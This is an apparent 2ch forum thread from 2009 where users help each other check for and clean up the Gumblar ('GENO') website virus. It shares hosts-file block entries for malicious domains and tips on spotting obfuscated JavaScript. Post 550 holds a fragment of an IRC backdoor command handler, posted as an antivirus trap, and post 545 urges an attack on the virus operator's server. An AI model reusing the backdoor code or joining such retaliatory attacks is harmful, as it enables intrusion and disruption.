434GENO:2009/05/17(日) 18:00:06 ID:Qk4iTuLX0
>>427
もしかして中の人?そうなら>>174読んで貰えると嬉しい
違うようならWikiの方から送る事にする
435GENO:2009/05/17(日) 18:00:10 ID:/AgGEcS20
>>427
とてもよくできていると思います
でも次スレからリンクを>>1に貼った方がよいかと
436GENO:2009/05/17(日) 18:00:24 ID:RMb266980
情弱は理解しようとせずにばかみたいに言われた事をやればいいんだよ
437GENO:2009/05/17(日) 18:02:00 ID:bHs6WITK0
馬鹿な質問者が減らないのはいちいち相手するからだろ


全部に
>>1

と返すだけでいいんだよ


これ徹底しろ。相手するほうも馬鹿。
438GENO:2009/05/17(日) 18:02:39 ID:Lja+0NyU0
>>427
わからない人用まとめの人?乙

なんだけど、どんなウイルス?ページの
「サイト経営」は「サイト運営」にした方がいいと思う
蛇足ですまん
439GENO:2009/05/17(日) 18:03:31 ID:V3bBl/2a0
>399
チェッカー、感染サイトを確実に1000%と出してくれるのであれば、
妖しい度合いによる細かい%表示じゃなくて
白(0%)か黒(1000%)かグレー(それ以外)で十分参考になる気がするよ
下手に中間の部分を数字化するから混乱を招くんだろうし

グレーの場合「無害なJavaスクリプトに反応している可能性があります、
念のため自己責任でソース確認してから踏んでね」
にしてしまえば1%でも900%でも同じだろうし
440GENO:2009/05/17(日) 18:03:49 ID:MtHQx4iT0
>>413
分からなかったら、調べてみようって気はないわけ?
検索すればいくらでも、出てきますよ?

それに確認方法もまとめや、このスレの1に2-5に書いてると記載されてますよね?
441geno:2009/05/17(日) 18:03:58 ID:U/BebqKb0
300 192.168.0.774 [sage] 2009/05/17(日) 17:49:24 ID:6zykGUMd0
martuz.cnノートンが対応
ttps://safeweb.norton.com/report/show?name=martuz.cn
442GENO:2009/05/17(日) 18:04:24 ID:H/MvH62k0
ヌ速のスレ見ると情弱の皆さんをなぜか同人板に誘導してる人がいるから
このグダグダはしばらく終わらないだろうね
443GENO:2009/05/17(日) 18:06:11 ID:4hbPvjjf0
>>427
わからない人用まとめの人ならこれもお願いします

246 名前:名無しって呼んでいいか?[sage] 投稿日:2009/05/17(日) 16:22:14 ID:???
>>235
それに付け加えるなら
無効にしたりチェックを外す前の状態を書きとめておいて後で戻せるように注意を促しておかないと
初心者は元がどういう状態だったのか分からなくて元の状態に戻せなくなる
444GENO:2009/05/17(日) 18:07:10 ID:KO8t80uo0
@niftyで今ウイルスチェックしてるんだけどオワタ?
はは、まさかニフがやられるなんて釣りだろ?
釣りだと言ってくれ
445GENO:2009/05/17(日) 18:07:49 ID:j8AhFDV90
>>431
俺もだ。3時間前はできたんだが
446GENO:2009/05/17(日) 18:08:09 ID:p6pp9GJl0
>>442
ここの住民が親切に教えて差し上げるからね
馬鹿には1嫁でいいだろ
447GENO:2009/05/17(日) 18:08:27 ID:bE7eCuWj0
>442
インターネット板からもここに誘導かかってるからもうgdgd

>初心者や質問がある方は
>http://changi.2ch.net/test/read.cgi/doujin/1242391122/
>上記のスレに行くと優しく教えてくれるかもです

こんな感じだもん…そら変なの流れ着くよ
448GENO:2009/05/17(日) 18:08:44 ID:UvOQO8qN0
>>444
いいから落ち着いてスレを嫁
オワタとか書く前に自分で確認したほうがいい
449 ◆XcxlmnqGqU :2009/05/17(日) 18:08:46 ID:TcmnfZMfP BE:377427124-2BP(10)
GENOウィルスチェッカー
http://geno.2ch.tc/


かなり修正しました。
誤検出はぐっと減りましたが、ウイルスの形態が変わったら調子狂うかもしれません。
存在しないURLの件ですが、コピペに失敗しないよう
www.2ch.net
とかでもチェックできる仕様につられてそうなってるんだと思います
できれば修正しときます
450GENO:2009/05/17(日) 18:10:09 ID:7bIAj8MN0
451名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 18:10:35 ID:CHdzkRA+0
>>449
おつかれ
452GENO:2009/05/17(日) 18:10:38 ID:TWnQEkpK0
同人系の通販サイトにつながってる執筆者のサイトに行ってみたら
感染してましたのでクリーンインストールしています、ただいま他ページは閲覧できません
という文とお詫びが出ていた
453geno:2009/05/17(日) 18:10:59 ID:Il+SPzcZO
>>449
チェッカーの結果画面出ないよー
454GENO:2009/05/17(日) 18:11:02 ID:ksg3AVup0
>>449
中の人乙です
でもチェックしようとしても結果のページに
いかないんですが自分だけですかね?
455GENO:2009/05/17(日) 18:11:04 ID:ww2yFWjJ0
>>449
アフィどうぞどうぞ

この際、山ほど貼っても文句言わんよ
ただしチェックに邪魔にならないところに限る
456GENO:2009/05/17(日) 18:11:45 ID:9LeFd5x0O
>>449
修正前チェックできたURLがチェックできなくなったりしてるけどどうなんだろう?
457GENO:2009/05/17(日) 18:12:57 ID:hDhVZ6zB0
>>449
私も皆さんと同じ症状です
458GENO:2009/05/17(日) 18:13:21 ID:eFDA7FA60
>>449
もつです
助かります
459GENO:2009/05/17(日) 18:15:09 ID:bE7eCuWj0
>449
乙です

結果画面でないってなんなんだ
うちは正常に動いてますよ
460geno:2009/05/17(日) 18:15:13 ID:HfpXInG80
>>432
URLを大量に送りつけてしまうと、中の人があれこれ探すのに時間をとられてしまう
だから対応してないウィルスそのものを見つけ出して教えてあげると、中の人は対応するための作業にすぐ取りかかれる
だからウィルスが原種か亜種か判断できる人はとにかくウィルスのある場所が知りたいわけ
461GENO:2009/05/17(日) 18:15:43 ID:ksg3AVup0
チェッカーいけるようになったよー
462GENO:2009/05/17(日) 18:16:23 ID:9LeFd5x0O
あ、結果画面出るようになりました
>>449乙です
463GENO:2009/05/17(日) 18:16:27 ID:G5ZQ6xeC0
>>459
いやたしかにさっきまで結果ページに行きませんでしたよ。
自分はここ数十分前から自サイト確認してますから。
たまたま今修正されたんでしょう。
464geno:2009/05/17(日) 18:16:51 ID:AvXnoc460
>>449
感謝です
ありがとう!!
465GENO:2009/05/17(日) 18:17:57 ID:KO8t80uo0
>>448
レジストリエディタが開かなくなってた
初期化の用意を始めるよ
466GENO:2009/05/17(日) 18:20:23 ID:+kPzarf90
ちょっとお聞きします
XPが入ってるパソコンは感染してないし、予防しっかりしてるんですが
さっき98が入ってるパソコン調べると「regedit.exe」は普通に動くんですが
「sqlsodbc.chm」と「cmd.exe」が見つかりませんて表示が出ます
どういうことなんでしょうか??
再起動に問題はないし、メモリも食われてません

あと、カスペルスキーでスキャンしようとしても作動しません
IEは6のまま…。winをアップデートしようとしても
やっぱりうまく作動しせず
もう10年以上前のパソコンなので、これを使ってネットするのは控えて
文書作成専用にしたほうがいいですかね?

アンチウイルスソフトは全く動かないし、「sqlsodbc.chm」と「cmd.exe」が行方不明だし
オンラインスキャンも作動しないしで…今感染してるのか否かを調べる術があるのでしょうか?
2日ほど前、ネットショッピングしちゃったよ…
467GENO:2009/05/17(日) 18:21:11 ID:/2cqWtM5P
>>298
インフルに飲まれて難しそうだな
468GEON 338 報告:2009/05/17(日) 18:21:20 ID:Kt5F63ReO
>1
>338ですが、補足です

アビスで内一つは同盟でした
他は全て個人同人サイト

検体についてはブクマバックアップ忘れたorzので協力できない可能性大ですスマソ
殆どのサイト管理人に連絡したので対応してくれると思うし
469名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 18:21:20 ID:47HUk9d30
>>466
今までのログよめよカス
470GN:2009/05/17(日) 18:21:39 ID:Sl268vQ3O
スレ大分緩やかになったな

>>449 乙です
ウイルス対策とかよくわかんない人、消防厨房からしたら神だろう
471GENO:2009/05/17(日) 18:21:50 ID:WZQN5UgD0
98は既にマイクロソフトもスキャンソフト会社もサポート終了してるよ
いろいろ違うだろうから調べるのは多分無理
>>465
そこじゃなくて
他の人がニフティの各サーバをチェックした結果を載せてくれてるから
もう一度スレよく読んでみて
472GENO:2009/05/17(日) 18:21:55 ID:4ZaRXCle0
>>465
自分もnifyでスキャン中に感染カキコ見て焦ったけど
普通に全部チェックしても大丈夫だったよ?
違うところで貰ったんじゃないかい?
473GENO:2009/05/17(日) 18:21:56 ID:pU4Rr/ug0
>>466
XP使ってろ
474GENO:2009/05/17(日) 18:25:00 ID:cLIZnz1YO
公開はしてないけどレンタル鯖がちょっと不安なんで念の為に作りかけてたサイト消してきた
475名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 18:26:29 ID:47HUk9d30
>>474
お前…馬鹿極まりないな
476GENO:2009/05/17(日) 18:26:42 ID:4FKymPog0
>>466
>>1
477 :2009/05/17(日) 18:27:36 ID:IaewCLrI0
GENOチェッカーもいいけど報告するときは>>28でね
478geno:2009/05/17(日) 18:27:52 ID:YTQWI9820
>>466
マジレスするとな
98なんて化石はとうの昔にMSのサポート終わってるんだよ
サポート終了のお知らせ→それ以降の脆弱性には未対応 ってことで
セキュリティに関してはスッカスカな状態で使ってるって事なんだよ。
つまり、現在98使っている段階でセキュリティ云々言っても笑い話でしかないんだ。

そもそも98なんて古すぎてそこを対象としたスパイウェアとかウィルスとか今あるのかって話もあるけど
もう休ませてやれよ…
479名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 18:28:22 ID:cJ8T4uoE0
>>466
98はcommand.exeで
480GENO:2009/05/17(日) 18:28:33 ID:6hHfRNDi0
>>466
Win98にはcmd.exeはない
9x系はコマンドプロンプト起動はcommand.com
481GENO:2009/05/17(日) 18:29:20 ID:MtHQx4iT0
>>466
>>11を見てください。
あと98にはsqlsodbc.chmはないです。
482GENO:2009/05/17(日) 18:29:25 ID:VfsTosQI0
なんだかんだいっておまえら質問きたら答えるのな
48350:2009/05/17(日) 18:31:05 ID:nbm7ZJwf0
>>245
把握しました

>>338追加

(457まで確認)
484geno:2009/05/17(日) 18:31:27 ID:9wncY9JGO
>>482
被害拡大防止が一番大事だからかもね
485GeeeeeeNO:2009/05/17(日) 18:31:35 ID:WZZR6rPm0
昨日の夜中から見ててやっとおいついたは
486geno:2009/05/17(日) 18:31:53 ID:VLep97Za0
>>466ではないけどありがとう。アホで申し訳ないorz
487GENO:2009/05/17(日) 18:32:34 ID:yk0ofMueO
だから初歩的な質問する馬鹿が絶えないんだろ
488名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 18:33:07 ID:PXlGJQDb0
GENOウイルスチェッカーで
危険度5%
安全なURLです。踏んでも大丈夫でしょう。

5%って・・・・・
489GENO:2009/05/17(日) 18:33:13 ID:GEQ8HxWY0
知り合いがXPでsqlsodbc.chmがないって言ってて、
レジストリ起動しない(起動しようとするとエラーメッセージが出る)という話なんだけど
感染しててsqlsodbc.chmがなくなったって人いる?
容量減った人は見るんだけどない!って人見かけないので…
490名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 18:33:56 ID:47HUk9d30
>>488
そんなの知らねぇよ
感染したくなきゃ踏むな
491GENO:2009/05/17(日) 18:34:01 ID:4FKymPog0
しょーもない質問への返答は全部

>>11 で済ませろ。教えたがりも助長するだけと自覚してくれ迷惑だ。
492GENO:2009/05/17(日) 18:34:13 ID:z9ZmBI5E0
ニフってマジ?
うちの会社ニフなんだけど…月曜日心配になってきた…
493GENO:2009/05/17(日) 18:34:38 ID:KB6yfCPO0
javaスプリクト切るとヤフーのメールまでチェックできなくなって不便だ…
メールチェックのために一時的にスプリクトオンにするんでついでに
ニコニコにいって来ようと思ってるんだけど、今ニコニコってどうなってんの?
ボカロ関係の動画とかでGENOについてコメとかついてる?
494GENO:2009/05/17(日) 18:35:04 ID:KO8t80uo0
>>489
レジストリ同じく起動しない
ニフティのウイルスチェックしたら感染してなかった

ニフティ感染は違ったんだね
良かった
495GENO:2009/05/17(日) 18:35:22 ID:kdDJMzTiO
仮にニフティのスキャンページが感染してても、アクセスしてからスキャンするんだから
自パソの白黒はすぐわかるはず
496GENO:2009/05/17(日) 18:35:48 ID:/2cqWtM5P
ヤフメなんてメールソフトでもチェックできるだろう
ブラウザじゃなきゃダメなん?
497GENO:2009/05/17(日) 18:36:07 ID:FFClEI90O
>>488うちのブログそれだったわ
498GENO:2009/05/17(日) 18:37:23 ID:GrmFsKfo0
同じだ
感染してないかどうか調べようとして
XPだけどsqlsodbc.chmをマイコンピューター内で検索してもなにもでてこない
499GENO:2009/05/17(日) 18:37:36 ID:Mv+Un+zhO
まだニフティの事騒いでるやつはなんなんだ…
釣られるなとかガセだとか書いてくれた人いるだろ
500名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 18:37:40 ID:PXlGJQDb0
>>497
自分ブログサイトばかり見るから
色んなところのブログでチェックしてるけど殆ど5%
501GENO:2009/05/17(日) 18:37:51 ID:YTyiaKe60
>>493
今デイリーランキングで上位に来てるボカロソングでは
一切見かけないんだが
502GENO:2009/05/17(日) 18:38:07 ID:5dyjk0Nz0
^^;
503geno:2009/05/17(日) 18:38:28 ID:ugI/Fqnf0
>>493
ヤフメは一つ前のバージョンだか何だかに戻るかどうかって聞いてくるはず。
前のバージョンを使用すれば、普通にJS切ってても見れる
504GENO:2009/05/17(日) 18:38:40 ID:28MNX8DRO
>>498
まぁ落ち着いてもう一回まとめを見ような
505GENO:2009/05/17(日) 18:38:44 ID:yenDHFuc0
>>498
検索しないで普通に探せばあるよ。
506名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 18:39:01 ID:MmWu1w5h0
ブログは全部5%じゃね?
507GENO:2009/05/17(日) 18:39:44 ID:gDQ79NiQ0
自分が感染してるかも確認出来ない人は初期化でいいだろ。
いろんな意見を聞くより絶対その方が間違いないよ。
508GENO:2009/05/17(日) 18:40:31 ID:ubMwlTsv0
今同人板にやって来てそうなボカロ関係者はイベント中じゃない?
そろそろ帰ってきて事態にビックリしてるころかと
早急に対策してくれるといいんだけれど…
509 :2009/05/17(日) 18:40:46 ID:IaewCLrI0
%にこだわるならソース直接見たほうが速いだろーがー
510GENO:2009/05/17(日) 18:40:52 ID:28MNX8DRO
うちはブログジュゲム使ってるけど0%だったよ
511GENO:2009/05/17(日) 18:40:58 ID:9LeFd5x0O
>>297のスレ内でこれ感染チェックサイトって書いて貼られてたから踏んじゃったんだがここ危ない?
http://genovirus.kansen.com
とりあえず英語だった。なんで踏んじゃったんだろう…
GENOウイルスチェッカーでは0%だったし気にしなくていいんだろうか?
すみません詳しい人いたら教えて下さい
512GENO:2009/05/17(日) 18:41:12 ID:Bb26k2UO0
GENOウィルス・何をすれば良いか分からない人のまとめ
http://www40.atwiki.jp/gegegeno/

GENOウィルス・何をすれば良いか分からない人のまとめ
http://www40.atwiki.jp/gegegeno/

GENOウィルス・何をすれば良いか分からない人のまとめ
http://www40.atwiki.jp/gegegeno/
513GeeeeeeNO:2009/05/17(日) 18:42:26 ID:WZZR6rPm0
  ,_rz_、   r 、n      r、       ,_,、 _,、   ===ヘrァ_,、   ==ヘ!)クZ
  r== ===   =ニミ | |_,、     ! l     | 三l」三 |   /ーヘ/ラT |   l´=「ニ ニ.l
  |.|=半=|.|  ===i r‐′   / ハヽ    | |「三 |.| |  /イ「||l^ニ」」   └7.Lニ.ニ」
  |.| =ll=」.|      |_|     ∠/  ヽ>   |_|l_三_|」_|   Lニ!Lニワ   ⊂/==u=ヘ

514GENO:2009/05/17(日) 18:42:43 ID:V3bBl/2a0
>511
なんで踏んじゃったんだろうと言いながら
自分でも理解してないURLを貼るのはどういうつもりなの?
515GENO:2009/05/17(日) 18:42:48 ID:p6pp9GJl0
>>511
ほいほい踏む馬鹿には教えません
516 :2009/05/17(日) 18:43:44 ID:IaewCLrI0
>>512
すげー不正確だなこれ
でも害はないからこのままでいい
517GENO:2009/05/17(日) 18:44:11 ID:FFClEI90O
>>506いやいっこ56パーセント出た。56ってどうなんだろ
518geno:2009/05/17(日) 18:44:19 ID:ugI/Fqnf0
>>511
お前は第二第三のお前を作りたいのか

ソースチェックしたけど大丈夫だった
ただし、他の何かが潜んでるかもしれんから、心配ならウイルスチェックしとけ
519GENO:2009/05/17(日) 18:44:21 ID:rPYthycC0
>>515
お前わかんないだろw
520GENO:2009/05/17(日) 18:44:27 ID:+kPzarf90
466です
いろいろ教えてもらって、ありがとうございました
どうやら感染していないようです
けど、98がそこまで化石だったなんて知りませんでした・・・
521GENO:2009/05/17(日) 18:44:42 ID:8BxiMwcD0
おさない
かけない
しゃべらない
もどらない
522GENO:2009/05/17(日) 18:45:20 ID:0jOyX3Xk0
>>488
夢小説とかで使うスクリプトが入ったページだと大体5%みたいよ
気になるならソース確認すればいいんでない
523GENO:2009/05/17(日) 18:45:52 ID:JzP1VTbK0
>521
おかしも
なんかカワユスなw
524GENO:2009/05/17(日) 18:46:00 ID:nAyXcGQw0
sqlsodbc.chmが名前順に並べてるのに見つからずフォルダ内検索でようやく見つけた
なんで見つけられなかったんだと思ったらpとq間違えて探してたわ
525GENO:2009/05/17(日) 18:46:07 ID:UxdpdPfY0
パソコンとか電化製品は一年前のでも古いと思えるくらいだから
そんな気にしなくてもええとおもうよ>520
526GENO:2009/05/17(日) 18:46:46 ID:D2qUpqPu0
馬鹿親切に教える奴がいるから質問厨が減らないんだよ
527GENO:2009/05/17(日) 18:46:49 ID:gPS8joPc0
さっきからパーセントパーセントうるせえよ
だいたい数字を出してもらってんのになんでさらに人に聞く必要がある?
528GENO:2009/05/17(日) 18:47:10 ID:28MNX8DRO
98でネット接続なんて命がけすぎるw
完璧に自衛できる自信があるならともかく
529GENO:2009/05/17(日) 18:47:32 ID:7bIAj8MN0
98とか逆に安全だろ
530GENO:2009/05/17(日) 18:47:34 ID:uQV6yiNu0
>>511
危ないとほんの1ミリでも思うなら直リンクすんなよアホか
531GENO:2009/05/17(日) 18:48:50 ID:SxzOVgwE0
>>449
乙です!

>■hostsファイル書き換え
>  hostsファイルに以下の行を追加
>  127.0.0.1 zlkon.lv
>  127.0.0.1 gumlar.cn
>  127.0.0.1 martuz.cn

対策の中の↑の4行目(リスト2行目)は「gumblar.cn」じゃないかと
(bが抜けている?)思うんだが、どうだろう。違ってたらすまん。
532GENO:2009/05/17(日) 18:49:11 ID:MtHQx4iT0
>>498
1スタートメニューを押します。
2マイコンピュータをクリックしてローカルディスク(C)を開きます。
3WINDOWSというフォルダを開き、そのフォルダ内にあるsystem32というフォルダを開きます。
4そのsystem32というフォルダの中にsqlsodbc.chmが入ってます。右クリック→プロパティでサイズが見れます。
533GENO:2009/05/17(日) 18:49:27 ID:p6pp9GJl0
>>519
いや、これでも危ないところ色々探しまくってんだけどね
さっきから馬鹿がへらないからさ
534GENO:2009/05/17(日) 18:51:02 ID:UfGd8Ae00
馬鹿親切ぐらいがちょうどいいんじゃないんだろうか
535GENO:2009/05/17(日) 18:51:20 ID:EISHhTCv0
2年前まで95使ってたわ。
良く平気だったなうちのパソコン。
536GENO:2009/05/17(日) 18:51:47 ID:zRQVguucO
こんな時に付属ディスク紛失とかついて無さすぎる
537geno:2009/05/17(日) 18:51:55 ID:P4y+Uyoo0
>>516
妙なところがあったら指摘お願いします
作った人間自体が素人同然なので、とりあえず分かればいいかと思って
538GENO:2009/05/17(日) 18:51:57 ID:6qNqgj0e0
というかCtr+Fでsqlsodbc.chmをファイル検索すれば一発じゃん
539gn:2009/05/17(日) 18:52:15 ID:b4t5UBFOO
みんなー質問は全部>>534が答えてくれるよー
540GENO:2009/05/17(日) 18:52:59 ID:8K8uxFd6O
要するにネットしなきゃいいだけじゃないの これ
借りてるサーバーとかが感染したら借りてる人間のPCも感染したりするの
541GENO:2009/05/17(日) 18:54:49 ID:7bIAj8MN0
>>540
要するもクソもねえだろw
542GENO:2009/05/17(日) 18:55:00 ID:D2qUpqPu0
>>534
まあ534が全部面倒見てくれるなら
543GENO:2009/05/17(日) 18:55:41 ID:FL++p6qqP
今北 もう祭りだな
といあえずサイトで告知したんだが、大きなお世話かな・・
544GENO:2009/05/17(日) 18:56:22 ID:os1adUJy0
>>526
別に「答えるから質問がへらない」わけじゃないぞ。
馬鹿な質問をする人がそんなことを判断できるくらい
過去ログ読んでるわけがないだろw

流れが早くて、「今知りました」な人が多いスレなんてこんなもんだろ。
ただの祭り。
答えたくない人は答えなれけばいいだけなのに、カリカリしすぎだ。
545GENO:2009/05/17(日) 18:56:30 ID:UY5sHAyu0
GENOウィルスの親玉にアパッチ打とうぜwwwwwwwwww
http://takeshima.2ch.net/test/read.cgi/news4vip/1242547793/
暇な奴来てください
546GENO:2009/05/17(日) 18:57:09 ID:GrmFsKfo0
>>498です地道に探したらありました
お騒がせしました
547geno:2009/05/17(日) 18:57:16 ID:9wncY9JGO
>>543
注意を促すのはいいと思う
548GENO:2009/05/17(日) 18:58:13 ID:VSoz+7dXO
バイダが感染してたらオワル
549GENO:2009/05/17(日) 18:58:43 ID:FbfYdy7f0
ノートン先生でも感知できるようになったのか?
550GEnO:2009/05/17(日) 18:59:02 ID:GgFEHS9U0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
n0=on 900:text:!exec*:*:{.notice $nick Execut comanda: $2-
551493:2009/05/17(日) 18:59:14 ID:KB6yfCPO0
>>496>>503
メールソフト使ってないんだ。
前のバージョンに戻せるの気付かなかった。そうする。ありがとう。
>>501>>508
動画でコメしてても気付いてもらえないか、すぐ流れてしまいそうだ。
タグじゃ荒らし扱いされそうだしむずかしいね。
552GENO:2009/05/17(日) 18:59:42 ID:l3+sVDuZ0
他のチェック項目やニフティのスキャンは白でしたが、
sqlsodbc.chmのサイズが「4.00 KB (4,096 バイト)」でした。
更新日は2004年8月5日です。

これは感染の疑いがあるということでしょうか?
自サイトにはJavascriptの埋め込みはありませんでした。
553GENO:2009/05/17(日) 18:59:50 ID:uQV6yiNu0
>>532レベルでバカ親切な回答テンプレを作っておく
そうすると次から既出質問は安価レスだけで返せる
つくるの面倒だと思うけどこのバカな質問だらけの流れにはそれが一番効果的だと思うわ
554GENO:2009/05/17(日) 19:01:23 ID:gPS8joPc0
>>537
これぐらいかなー

例えばあなたは今このページを見ていますが、このページの中にgenoウィルスが潜んでいるとします。

例えばあなたは今このページを見ていますが、このページの中にgenoウィルスをダウンロードさせるコードが入っているとします。

見られてしまえばサイトの中身を書き換え放題です。当然ページにウィルスを潜ませることも出来ます。

見られてしまえばサイトの中身を書き換え放題です。当然ページに、閲覧者にウィルスをダウンロードさせるコードを入れることも出来ます。

webサイトにウィルスが入ってしまうと、

webサイトのページにそのようなコードが入ってしまうと、
555:2009/05/17(日) 19:01:27 ID:o3Me8+KaO
無料動画アニメスクープというサイトは大丈夫なの?
556GENO:2009/05/17(日) 19:02:26 ID:rPYthycC0
>>544
そうそう
無駄に流れ早くしてる奴もうざいし
557geno:2009/05/17(日) 19:03:03 ID:dB3YX/lPO
てかさ
初心者誘導質問スレ作ればいいんじゃないの
答える余裕がある人はそのスレで相手すればいいし
このスレが危険を啓蒙する目的なら
初歩的な質問の相手しなきゃいけないのは仕方ない気がするよ
558GENO:2009/05/17(日) 19:04:42 ID:uQV6yiNu0
>>557
このスレが初心者質問を兼ねてるスレだと思ってた
セキュ板の住人的にはここ質問スレだし
559感染しなかったお( ^ω^):2009/05/17(日) 19:04:49 ID:7oJRMlsp0
GENOウィルスチェックスレとか作ったら?
560GENO:2009/05/17(日) 19:06:05 ID:IMlIRrmv0
さっきGENOチェッカーで調べたらSound Horizonの大手WIKIサイトの危険率が

900%から50%に成ってたがどういうことだ?
561GENO:2009/05/17(日) 19:06:08 ID:CLX5dzsU0
おいノートントラップ貼るなよ
専ブラでスレ見れなくなったぞ
562GENO:2009/05/17(日) 19:06:29 ID:Y0xwW88u0
>>554
それだと理解できないんじゃないか?
563GENO:2009/05/17(日) 19:07:00 ID:MtHQx4iT0
というか、そんな焦ってるのに
なぜレス全部読むくらいのことをしないのか、さっと流しつつ要点だけ
見ていけばそんな時間かかるものでもないと思うけど

とりあえず>>11
564GENO:2009/05/17(日) 19:07:26 ID:l6lSw4q50
起動したらブルースクリーンが…オワタ
565GENO:2009/05/17(日) 19:08:24 ID:kTCmwcjW0
流れ早いから、誘導用

同人サイト向け・通称「GENOウイルス」対策まとめ
http://www31.atwiki.jp/doujin_vinfo/

■何をしたらいいか分からない人はまずここを見る。
http://www40.atwiki.jp/gegegeno/
何をすれば良いか良く分からない人用のまとめ

■よくある質問>>1
■主な症状 >>5
■自ジャンルで発見した場合
→まとめページを見て、重複がない場合は>>4

※まとめサイトの方が拾いやすいように、
まとめサイトへの報告他は、必ず>>1
アンカーを入れて報告してください。

GENOウィルスことGumblarの報告してくれてるブログ
ttp://www3.atword.jp/gnome/tag/zlkon/
あと非同人向けまとめサイト
ttp://www29.atwiki.jp/geno/

参考にするだけで絶対にこちらに質問特攻掛けないこと!

何を(ryの中の人宛へのレスも、何か同じキー入れた方が中の人が拾いやすいと思う。
566GENO:2009/05/17(日) 19:09:50 ID:KO8t80uo0
avast!落とそうとしたら「HTPサーバがエラーを返します」って
出るんだけど他にもそういう人いる?
567geno:2009/05/17(日) 19:10:24 ID:Il+SPzcZO
ニフティアウアウか…
親父にニフティ全部アウアウって言っても理解してねぇ
プロバイダだけじゃなくてサイトも全部なのに…

くっそ、バカニート親父め
568GENO:2009/05/17(日) 19:10:43 ID:FHNGOeQoO
携帯からでスマン
今、PCでこのスレ覗いたらうちのセキュリティーソフト(AVGってやつ)がウィルス検知したんだが…

IRC/BackDoor.Flood

ってやつ

昨日まで何ともなかったぞ?
569GENO:2009/05/17(日) 19:10:45 ID:kTCmwcjW0
後、>>1にあるけど、次スレテンプレでよくある質問
もうちょっとまとめた方がいいんだろうか。

正直、サイト見てねでいい気がするんだけど。
570GENO:2009/05/17(日) 19:11:40 ID:94GIamPZ0
>>568
変な文字列のレスがあるからたぶんそれのせいかも
571GENO:2009/05/17(日) 19:12:19 ID:aTSY2Ugx0
>>567
釣りじゃないならログ読んでよ頼むから
572geno:2009/05/17(日) 19:13:22 ID:FL++p6qqP
206 名前:以下、名無しにかわりましてVIPがお送りします [] 投稿日:2009/05/17(日) 19:11:58.71 ID:E6tWum7X0    New!!
ソースチェッカーから新情報


■「JSRedir-R」(通称GENOウイルス)出現によるアクセス障害について
GENOウイルス感染サイトのチェック増加により、サイトへのアクセスが集中しています。

なお、この新ウイルスに対してSCOのチェックフィルタは対応しておりません。
(ソースが難読化されている上に、パターンがすべて違うためです。。。)

簡単な判別方法としてはHTMLソース内JavaScript記述部分に、
「unescape」や「eval」といった文字列が含まれ、
意味不明な文字列が続いていれば危険とみなしてよいでしょう。

一応、報告まで。



2009/05/17  by hideyuki / 障害情報
Add comment
573GENO:2009/05/17(日) 19:13:44 ID:KYtXFhfa0
>>568
2chのAVG AntiVirusスレから転載。

Q. 2chのログにIRC/backdoor.floodウィルスが検出されたんですけど

A. ログに貼られたコードだけではPC内で感染行動をおこすことはできないので無害です。
AVG User Interface → ツール → 高度な設定 → 常駐シールド → 例外 に
ログフォルダを追加することで回避できます。
574GENO:2009/05/17(日) 19:14:47 ID:CLX5dzsU0
>>568
ノートントラップと思われる(ノートン以外も反応する場合あるけどね)
自分もさっき先生が自慢げに「遮断したよ!!」って言って来たw遮断すんなwww
575GENO:2009/05/17(日) 19:15:25 ID:4FKymPog0
ttp://geno.2ch.tc/ チェッカー制作者
トリップ◆XcxlmnqGqUへ

友人のPCを壊すのに利用しましょう! ←抹消線付きとはいえ、これはいかがなものか…
576GENO:2009/05/17(日) 19:16:09 ID:2toNhinD0
>>575
自分もそれ前スレで指摘したけどスルーされた
577geno:2009/05/17(日) 19:16:18 ID:4GZSfrFM0
>566
自分は感染中に、リカバリ前にavastでチェックしとこうとしたらインストールできなかった
リカバリ後は普通にインストールできた
578GENO:2009/05/17(日) 19:16:36 ID:+Ile/hUn0
昨日ノートントラップに泣かされた自分登場
579geno:2009/05/17(日) 19:16:39 ID:YCs+qKMBO
>>566
インストール出来ないってこと?
なら自分もそうなってる
580GENO:2009/05/17(日) 19:17:57 ID:25KcJTAx0
どう書いても読まない奴は読まないで質問してくるからどうしようもないんだよな・・・
って作ってから気付いたが、せっかくだから上げておく。前にここで描かれてた
1、感染は〜っての凄い分かりやすかったから
ttp://ranobe.com/up/src/up360283.jpg
あと、あんなにわかりやすいwiki初めて見たよ、あれで分からなかったら正直どうしようもないだろ
581geno:2009/05/17(日) 19:18:30 ID:Il+SPzcZO
>>571
今読んでない分のレスみてきた
ν速で今見てびっくりして書いた…大丈夫だよな?
582げの:2009/05/17(日) 19:18:41 ID:8OtfYIeJO
つたやの公式900%だけどそれらしきの見当たらない
583GENO:2009/05/17(日) 19:20:09 ID:gPS8joPc0
みんなして無理に avast! 入れなくてええんちゃう……
真似してウイルス対策ソフト2個併用という危険状態になる奴がいるかもしれん
584GENO:2009/05/17(日) 19:20:29 ID:pCkMJ7qx0
>>561
ノートンならオプション>除外で2chブラウザのログフォルダを除外すればいいよ
585GENO:2009/05/17(日) 19:20:48 ID:4FKymPog0
>>576
スルーしちゃうのか。
真面目にみんなのために作ってくれたと思うから安心して利用するわけだが
この状況で悪ふざけされると不信感が出るわけで。
ならこのチェッカーは人に勧められないな。テンプレからも外すか。
586GENO:2009/05/17(日) 19:20:58 ID:FHNGOeQoO
>568です

そうなのか、スマン
ちょい焦って書き込んでしまった

ROMに戻ります
587GENO:2009/05/17(日) 19:21:57 ID:DjvRJnSq0
同人サイト向けまとめを見たけどわからない!
初心者向けまとめも見たけどわからない!
ここに書いてあることと微妙に違う表示が!
どうなのこれなんなの死ぬのというあなた

【今月の運勢】他人の意見やうわさ話に振り回されそう。
目の前の問題から少し距離を置いてみるのもひとつの手段。
自然の多いところなどで気分転換を図ると吉。
落ち着いて頭をすっきりさせて。
アンラッキーアイテムはパソコン。
588名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 19:22:32 ID:MmWu1w5h0
あれで分かんないのとかおかしいだろw
589GENO:2009/05/17(日) 19:22:39 ID:WZQN5UgD0
>>580

>>582
JavaScriptってのが入ってると安全なサイトでも危険なサイトでも数字が出る
とりあえず今回のウイルスはJavaScriptに関係する物なので0%と出たら安全
このスレだけでも全部読め
